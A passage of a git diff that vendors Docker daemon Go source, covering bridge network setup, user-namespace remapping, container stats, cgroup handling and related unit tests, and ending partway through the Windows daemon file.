activeSandboxes map[string]interface{}) (libnetwork.NetworkController, 
error) { + netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) + if err != nil { + return nil, err + } + + controller, err := libnetwork.New(netOptions...) + if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + if len(activeSandboxes) > 0 { + logrus.Info("There are old running containers, the network config will not take affect") + return controller, nil + } + + // Initialize default network on "null" + if n, _ := controller.NetworkByName("none"); n == nil { + if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(true)); err != nil { + return nil, fmt.Errorf("Error creating default \"null\" network: %v", err) + } + } + + // Initialize default network on "host" + if n, _ := controller.NetworkByName("host"); n == nil { + if _, err := controller.NewNetwork("host", "host", "", libnetwork.NetworkOptionPersist(true)); err != nil { + return nil, fmt.Errorf("Error creating default \"host\" network: %v", err) + } + } + + // Clear stale bridge network + if n, err := controller.NetworkByName("bridge"); err == nil { + if err = n.Delete(); err != nil { + return nil, fmt.Errorf("could not delete the default bridge network: %v", err) + } + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } else { + removeDefaultBridgeInterface() + } + + return controller, nil +} + +func driverOptions(config *Config) []nwconfig.Option { + bridgeConfig := options.Generic{ + "EnableIPForwarding": config.bridgeConfig.EnableIPForward, + "EnableIPTables": config.bridgeConfig.EnableIPTables, + "EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy, + "UserlandProxyPath": config.bridgeConfig.UserlandProxyPath} + bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig} + + dOptions := []nwconfig.Option{} + dOptions = append(dOptions, 
nwconfig.OptionDriverConfig("bridge", bridgeOption)) + return dOptions +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + bridgeName := bridge.DefaultBridgeName + if config.bridgeConfig.Iface != "" { + bridgeName = config.bridgeConfig.Iface + } + netOption := map[string]string{ + bridge.BridgeName: bridgeName, + bridge.DefaultBridge: strconv.FormatBool(true), + netlabel.DriverMTU: strconv.Itoa(config.Mtu), + bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq), + bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + } + + // --ip processing + if config.bridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + } + + var ( + ipamV4Conf *libnetwork.IpamConf + ipamV6Conf *libnetwork.IpamConf + ) + + ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + + nwList, nw6List, err := netutils.ElectInterfaceAddresses(bridgeName) + if err != nil { + return errors.Wrap(err, "list bridge addresses failed") + } + + nw := nwList[0] + if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return errors.Wrap(err, "parse CIDR failed") + } + // Iterate through in case there are multiple addresses for the bridge + for _, entry := range nwList { + if fCIDR.Contains(entry.IP) { + nw = entry + break + } + } + } + + ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() + hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) + if hip.IsGlobalUnicast() { + ipamV4Conf.Gateway = nw.IP.String() + } + + if config.bridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.bridgeConfig.IP + ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if err != nil { + return err + } + ipamV4Conf.Gateway = ip.String() + } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { + logrus.Infof("Default bridge 
(%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) + } + + if config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return err + } + + ipamV4Conf.SubPool = fCIDR.String() + } + + if config.bridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + } + + var deferIPv6Alloc bool + if config.bridgeConfig.FixedCIDRv6 != "" { + _, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6) + if err != nil { + return err + } + + // In case user has specified the daemon flag --fixed-cidr-v6 and the passed network has + // at least 48 host bits, we need to guarantee the current behavior where the containers' + // IPv6 addresses will be constructed based on the containers' interface MAC address. + // We do so by telling libnetwork to defer the IPv6 address allocation for the endpoints + // on this network until after the driver has created the endpoint and returned the + // constructed address. Libnetwork will then reserve this address with the ipam driver. 
+ ones, _ := fCIDRv6.Mask.Size() + deferIPv6Alloc = ones <= 80 + + if ipamV6Conf == nil { + ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + } + ipamV6Conf.PreferredPool = fCIDRv6.String() + + // In case the --fixed-cidr-v6 is specified and the current docker0 bridge IPv6 + // address belongs to the same network, we need to inform libnetwork about it, so + // that it can be reserved with IPAM and it will not be given away to somebody else + for _, nw6 := range nw6List { + if fCIDRv6.Contains(nw6.IP) { + ipamV6Conf.Gateway = nw6.IP.String() + break + } + } + } + + if config.bridgeConfig.DefaultGatewayIPv6 != nil { + if ipamV6Conf == nil { + ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + } + ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String() + } + + v4Conf := []*libnetwork.IpamConf{ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + if ipamV6Conf != nil { + v6Conf = append(v6Conf, ipamV6Conf) + } + // Initialize default network on "bridge" with the same name + _, err = controller.NewNetwork("bridge", "bridge", "", + libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6), + libnetwork.NetworkOptionDriverOpts(netOption), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc)) + if err != nil { + return fmt.Errorf("Error creating default \"bridge\" network: %v", err) + } + return nil +} + +// Remove default bridge interface if present (--bridge=none use case) +func removeDefaultBridgeInterface() { + if lnk, err := netlink.LinkByName(bridge.DefaultBridgeName); err == nil { + if err := netlink.LinkDel(lnk); err != nil { + logrus.Warnf("Failed to remove bridge interface (%s): %v", bridge.DefaultBridgeName, err) + } + } +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return daemon.setupInitLayer +} + +// Parse the remapped root (user namespace) option, which can be one of: +// 
username - valid username from /etc/passwd +// username:groupname - valid username; valid groupname from /etc/group +// uid - 32-bit unsigned int valid Linux UID value +// uid:gid - uid value; 32-bit unsigned int Linux GID value +// +// If no groupname is specified, and a username is specified, an attempt +// will be made to lookup a gid for that username as a groupname +// +// If names are used, they are verified to exist in passwd/group +func parseRemappedRoot(usergrp string) (string, string, error) { + + var ( + userID, groupID int + username, groupname string + ) + + idparts := strings.Split(usergrp, ":") + if len(idparts) > 2 { + return "", "", fmt.Errorf("Invalid user/group specification in --userns-remap: %q", usergrp) + } + + if uid, err := strconv.ParseInt(idparts[0], 10, 32); err == nil { + // must be a uid; take it as valid + userID = int(uid) + luser, err := idtools.LookupUID(userID) + if err != nil { + return "", "", fmt.Errorf("Uid %d has no entry in /etc/passwd: %v", userID, err) + } + username = luser.Name + if len(idparts) == 1 { + // if the uid was numeric and no gid was specified, take the uid as the gid + groupID = userID + lgrp, err := idtools.LookupGID(groupID) + if err != nil { + return "", "", fmt.Errorf("Gid %d has no entry in /etc/group: %v", groupID, err) + } + groupname = lgrp.Name + } + } else { + lookupName := idparts[0] + // special case: if the user specified "default", they want Docker to create or + // use (after creation) the "dockremap" user/group for root remapping + if lookupName == defaultIDSpecifier { + lookupName = defaultRemappedID + } + luser, err := idtools.LookupUser(lookupName) + if err != nil && idparts[0] != defaultIDSpecifier { + // error if the name requested isn't the special "dockremap" ID + return "", "", fmt.Errorf("Error during uid lookup for %q: %v", lookupName, err) + } else if err != nil { + // special case-- if the username == "default", then we have been asked + // to create a new entry pair in 
/etc/{passwd,group} for which the /etc/sub{uid,gid} + // ranges will be used for the user and group mappings in user namespaced containers + _, _, err := idtools.AddNamespaceRangesUser(defaultRemappedID) + if err == nil { + return defaultRemappedID, defaultRemappedID, nil + } + return "", "", fmt.Errorf("Error during %q user creation: %v", defaultRemappedID, err) + } + username = luser.Name + if len(idparts) == 1 { + // we only have a string username, and no group specified; look up gid from username as group + group, err := idtools.LookupGroup(lookupName) + if err != nil { + return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err) + } + groupID = group.Gid + groupname = group.Name + } + } + + if len(idparts) == 2 { + // groupname or gid is separately specified and must be resolved + // to an unsigned 32-bit gid + if gid, err := strconv.ParseInt(idparts[1], 10, 32); err == nil { + // must be a gid, take it as valid + groupID = int(gid) + lgrp, err := idtools.LookupGID(groupID) + if err != nil { + return "", "", fmt.Errorf("Gid %d has no entry in /etc/passwd: %v", groupID, err) + } + groupname = lgrp.Name + } else { + // not a number; attempt a lookup + if _, err := idtools.LookupGroup(idparts[1]); err != nil { + return "", "", fmt.Errorf("Error during groupname lookup for %q: %v", idparts[1], err) + } + groupname = idparts[1] + } + } + return username, groupname, nil +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + if runtime.GOOS != "linux" && config.RemappedRoot != "" { + return nil, nil, fmt.Errorf("User namespaces are only supported on Linux") + } + + // if the daemon was started with remapped root option, parse + // the config option to the int uid,gid values + var ( + uidMaps, gidMaps []idtools.IDMap + ) + if config.RemappedRoot != "" { + username, groupname, err := parseRemappedRoot(config.RemappedRoot) + if err != nil { + return nil, nil, err + } + if username == "root" { + // Cannot setup 
user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op + // effectively + logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF") + return uidMaps, gidMaps, nil + } + logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname) + // update remapped root setting now that we have resolved them to actual names + config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname) + + uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname) + if err != nil { + return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err) + } + } + return uidMaps, gidMaps, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + config.Root = rootDir + // the docker root metadata directory needs to have execute permissions for all users (g+x,o+x) + // so that syscalls executing as non-root, operating on subdirectories of the graph root + // (e.g. mounted layers of a container) can traverse this path. + // The user namespace support will create subdirectories for the remapped root host uid:gid + // pair owned by that same uid:gid pair for proper write access to those needed metadata and + // layer content subtrees. 
+ if _, err := os.Stat(rootDir); err == nil { + // root current exists; verify the access bits are correct by setting them + if err = os.Chmod(rootDir, 0711); err != nil { + return err + } + } else if os.IsNotExist(err) { + // no root exists yet, create it 0711 with root:root ownership + if err := os.MkdirAll(rootDir, 0711); err != nil { + return err + } + } + + // if user namespaces are enabled we will create a subtree underneath the specified root + // with any/all specified remapped root uid/gid options on the daemon creating + // a new subdirectory with ownership set to the remapped uid/gid (so as to allow + // `chdir()` to work for containers namespaced to that uid/gid) + if config.RemappedRoot != "" { + config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID)) + logrus.Debugf("Creating user namespaced daemon root: %s", config.Root) + // Create the root directory if it doesn't exist + if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil { + return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err) + } + // we also need to verify that any pre-existing directories in the path to + // the graphroot won't block access to remapped root--if any pre-existing directory + // has strict permissions that don't allow "x", container start will fail, so + // better to warn and fail now + dirPath := config.Root + for { + dirPath = filepath.Dir(dirPath) + if dirPath == "/" { + break + } + if !idtools.CanAccess(dirPath, rootUID, rootGID) { + return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root) + } + } + } + return nil +} + +// registerLinks writes the links to a file. 
+func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() { + return nil + } + + for _, l := range hostConfig.Links { + name, alias, err := runconfigopts.ParseLink(l) + if err != nil { + return err + } + child, err := daemon.GetContainer(name) + if err != nil { + return fmt.Errorf("Could not get container for %s", name) + } + for child.HostConfig.NetworkMode.IsContainer() { + parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2) + child, err = daemon.GetContainer(parts[1]) + if err != nil { + return fmt.Errorf("Could not get container for %s", parts[1]) + } + } + if child.HostConfig.NetworkMode.IsHost() { + return runconfig.ErrConflictHostNetworkAndLinks + } + if err := daemon.registerLink(container, child, alias); err != nil { + return err + } + } + + // After we load all the links into the daemon + // set them to nil on the hostconfig + return container.WriteHostConfig() +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. +func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + return daemon.Mount(container) +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. 
+func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + return daemon.Unmount(container) +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + if !c.IsRunning() { + return nil, errNotRunning{c.ID} + } + stats, err := daemon.containerd.Stats(c.ID) + if err != nil { + return nil, err + } + s := &types.StatsJSON{} + cgs := stats.CgroupStats + if cgs != nil { + s.BlkioStats = types.BlkioStats{ + IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive), + IoServicedRecursive: copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive), + IoQueuedRecursive: copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive), + IoServiceTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive), + IoWaitTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive), + IoMergedRecursive: copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive), + IoTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive), + SectorsRecursive: copyBlkioEntry(cgs.BlkioStats.SectorsRecursive), + } + cpu := cgs.CpuStats + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: cpu.CpuUsage.TotalUsage, + PercpuUsage: cpu.CpuUsage.PercpuUsage, + UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode, + UsageInUsermode: cpu.CpuUsage.UsageInUsermode, + }, + ThrottlingData: types.ThrottlingData{ + Periods: cpu.ThrottlingData.Periods, + ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods, + ThrottledTime: cpu.ThrottlingData.ThrottledTime, + }, + } + mem := cgs.MemoryStats.Usage + s.MemoryStats = types.MemoryStats{ + Usage: mem.Usage, + MaxUsage: mem.MaxUsage, + Stats: cgs.MemoryStats.Stats, + Failcnt: mem.Failcnt, + Limit: mem.Limit, + } + // if the container does not set memory limit, use the machineMemory + if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 { + s.MemoryStats.Limit = daemon.statsCollector.machineMemory + } + if cgs.PidsStats != nil { + s.PidsStats = 
types.PidsStats{ + Current: cgs.PidsStats.Current, + } + } + } + s.Read, err = ptypes.Timestamp(stats.Timestamp) + if err != nil { + return nil, err + } + return s, nil +} + +// setDefaultIsolation determines the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} + +// setupDaemonProcess sets various settings for the daemon's process +func setupDaemonProcess(config *Config) error { + // setup the daemons oom_score_adj + return setupOOMScoreAdj(config.OOMScoreAdjust) +} + +func setupOOMScoreAdj(score int) error { + f, err := os.OpenFile("/proc/self/oom_score_adj", os.O_WRONLY, 0) + if err != nil { + return err + } + + stringScore := strconv.Itoa(score) + _, err = f.WriteString(stringScore) + if os.IsPermission(err) { + // Setting oom_score_adj does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. + if !rsystem.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to /proc/self/oom_score_adj", stringScore) + } + return nil + } + f.Close() + return err +} + +func (daemon *Daemon) initCgroupsPath(path string) error { + if path == "/" || path == "." { + return nil + } + + if daemon.configStore.CPURealtimePeriod == 0 && daemon.configStore.CPURealtimeRuntime == 0 { + return nil + } + + // Recursively create cgroup to ensure that the system and all parent cgroups have values set + // for the period and runtime as this limits what the children can be set to. 
+ daemon.initCgroupsPath(filepath.Dir(path)) + + _, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") + if err != nil { + return err + } + + path = filepath.Join(root, path) + sysinfo := sysinfo.New(true) + if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 { + if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return err + } + if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil { + return err + } + } + if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 { + if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return err + } + if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + if daemon.configStore.SeccompProfile != "" { + daemon.seccompProfilePath = daemon.configStore.SeccompProfile + b, err := ioutil.ReadFile(daemon.configStore.SeccompProfile) + if err != nil { + return fmt.Errorf("opening seccomp profile (%s) failed: %v", daemon.configStore.SeccompProfile, err) + } + daemon.seccompProfile = b + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go new file mode 100644 index 0000000000..6250d359e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go @@ -0,0 +1,283 @@ +// +build !windows,!solaris + +package daemon + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" +) + +// Unix 
test as uses settings which are not available on Windows +func TestAdjustCPUShares(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + + hostConfig := &containertypes.HostConfig{ + Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1}, + } + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != linuxMinCPUShares { + t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares) + } + + hostConfig.CPUShares = linuxMaxCPUShares + 1 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != linuxMaxCPUShares { + t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares) + } + + hostConfig.CPUShares = 0 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != 0 { + t.Error("Expected CPUShares to be unchanged") + } + + hostConfig.CPUShares = 1024 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != 1024 { + t.Error("Expected CPUShares to be unchanged") + } +} + +// Unix test as uses settings which are not available on Windows +func TestAdjustCPUSharesNoAdjustment(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + + hostConfig := &containertypes.HostConfig{ + Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1}, + } + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != linuxMinCPUShares-1 { + t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares-1) + } + + hostConfig.CPUShares = linuxMaxCPUShares + 1 + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != linuxMaxCPUShares+1 { + t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares+1) + } + + hostConfig.CPUShares = 0 + 
daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != 0 { + t.Error("Expected CPUShares to be unchanged") + } + + hostConfig.CPUShares = 1024 + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != 1024 { + t.Error("Expected CPUShares to be unchanged") + } +} + +// Unix test as uses settings which are not available on Windows +func TestParseSecurityOptWithDeprecatedColon(t *testing.T) { + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test apparmor + config.SecurityOpt = []string{"apparmor=test_profile"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.AppArmorProfile != "test_profile" { + t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile) + } + + // test seccomp + sp := "/path/to/seccomp_test.json" + config.SecurityOpt = []string{"seccomp=" + sp} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.SeccompProfile != sp { + t.Fatalf("Unexpected AppArmorProfile, expected: %q, got %q", sp, container.SeccompProfile) + } + + // test valid label + config.SecurityOpt = []string{"label=user:USER"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + + // test invalid label + config.SecurityOpt = []string{"label"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } + + // test invalid opt + config.SecurityOpt = []string{"test"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } +} + +func TestParseSecurityOpt(t *testing.T) { + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test apparmor + config.SecurityOpt = 
[]string{"apparmor=test_profile"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.AppArmorProfile != "test_profile" { + t.Fatalf("Unexpected AppArmorProfile, expected: \"test_profile\", got %q", container.AppArmorProfile) + } + + // test seccomp + sp := "/path/to/seccomp_test.json" + config.SecurityOpt = []string{"seccomp=" + sp} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + if container.SeccompProfile != sp { + t.Fatalf("Unexpected SeccompProfile, expected: %q, got %q", sp, container.SeccompProfile) + } + + // test valid label + config.SecurityOpt = []string{"label=user:USER"} + if err := parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected parseSecurityOpt error: %v", err) + } + + // test invalid label + config.SecurityOpt = []string{"label"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } + + // test invalid opt + config.SecurityOpt = []string{"test"} + if err := parseSecurityOpt(container, config); err == nil { + t.Fatal("Expected parseSecurityOpt error, got nil") + } +} + +func TestNetworkOptions(t *testing.T) { + daemon := &Daemon{} + dconfigCorrect := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "consul://localhost:8500", + ClusterAdvertise: "192.168.0.1:8000", + }, + } + + if _, err := daemon.networkOptions(dconfigCorrect, nil, nil); err != nil { + t.Fatalf("Expect networkOptions success, got error: %v", err) + } + + dconfigWrong := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "consul://localhost:8500://test://bbb", + }, + } + + if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil { + t.Fatalf("Expected networkOptions error, got nil") + } +} + +func TestMigratePre17Volumes(t *testing.T) { + rootDir, err := ioutil.TempDir("", "test-daemon-volumes") + if err != nil 
{ + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + volumeRoot := filepath.Join(rootDir, "volumes") + err = os.MkdirAll(volumeRoot, 0755) + if err != nil { + t.Fatal(err) + } + + containerRoot := filepath.Join(rootDir, "containers") + cid := "1234" + err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755) + + vid := "5678" + vfsPath := filepath.Join(rootDir, "vfs", "dir", vid) + err = os.MkdirAll(vfsPath, 0755) + if err != nil { + t.Fatal(err) + } + + config := []byte(` + { + "ID": "` + cid + `", + "Volumes": { + "/foo": "` + vfsPath + `", + "/bar": "/foo", + "/quux": "/quux" + }, + "VolumesRW": { + "/foo": true, + "/bar": true, + "/quux": false + } + } + `) + + volStore, err := store.New(volumeRoot) + if err != nil { + t.Fatal(err) + } + drv, err := local.New(volumeRoot, 0, 0) + if err != nil { + t.Fatal(err) + } + volumedrivers.Register(drv, volume.DefaultDriverName) + + daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore} + err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600) + if err != nil { + t.Fatal(err) + } + c, err := daemon.load(cid) + if err != nil { + t.Fatal(err) + } + if err := daemon.verifyVolumesInfo(c); err != nil { + t.Fatal(err) + } + + expected := map[string]volume.MountPoint{ + "/foo": {Destination: "/foo", RW: true, Name: vid}, + "/bar": {Source: "/foo", Destination: "/bar", RW: true}, + "/quux": {Source: "/quux", Destination: "/quux", RW: false}, + } + for id, mp := range c.MountPoints { + x, exists := expected[id] + if !exists { + t.Fatal("volume not migrated") + } + if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name { + t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go new file mode 100644 index 0000000000..cb1acf63d6 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go @@ -0,0 +1,5 @@ +// +build !linux,!freebsd,!windows,!solaris + +package daemon + +const platformSupported = false diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go new file mode 100644 index 0000000000..51ad68b357 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go @@ -0,0 +1,604 @@ +package daemon + +import ( + "fmt" + "os" + "strings" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/platform" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/datastore" + winlibnetwork "github.com/docker/libnetwork/drivers/windows" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + blkiodev "github.com/opencontainers/runc/libcontainer/configs" + "golang.org/x/sys/windows" +) + +const ( + defaultNetworkSpace = "172.16.0.0/12" + platformSupported = true + windowsMinCPUShares = 1 + windowsMaxCPUShares = 10000 + windowsMinCPUPercent = 1 + windowsMaxCPUPercent = 100 + windowsMinCPUCount = 1 +) + +func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) { + return nil, nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + return nil +} + +func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioWriteIOpsDevices(config 
*containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { + return nil, nil +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return nil +} + +func checkKernel() error { + return nil +} + +func (daemon *Daemon) getCgroupDriver() string { + return "" +} + +// adaptContainerSettings is called during container creation to modify any +// settings necessary in the HostConfig structure. +func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { + if hostConfig == nil { + return nil + } + + return nil +} + +func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) { + warnings := []string{} + + if !isHyperv { + // The processor resource controls are mutually exclusive on + // Windows Server Containers, the order of precedence is + // CPUCount first, then CPUShares, and CPUPercent last. + if resources.CPUCount > 0 { + if resources.CPUShares > 0 { + warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + logrus.Warn("Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded") + resources.CPUShares = 0 + } + if resources.CPUPercent > 0 { + warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + logrus.Warn("Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. 
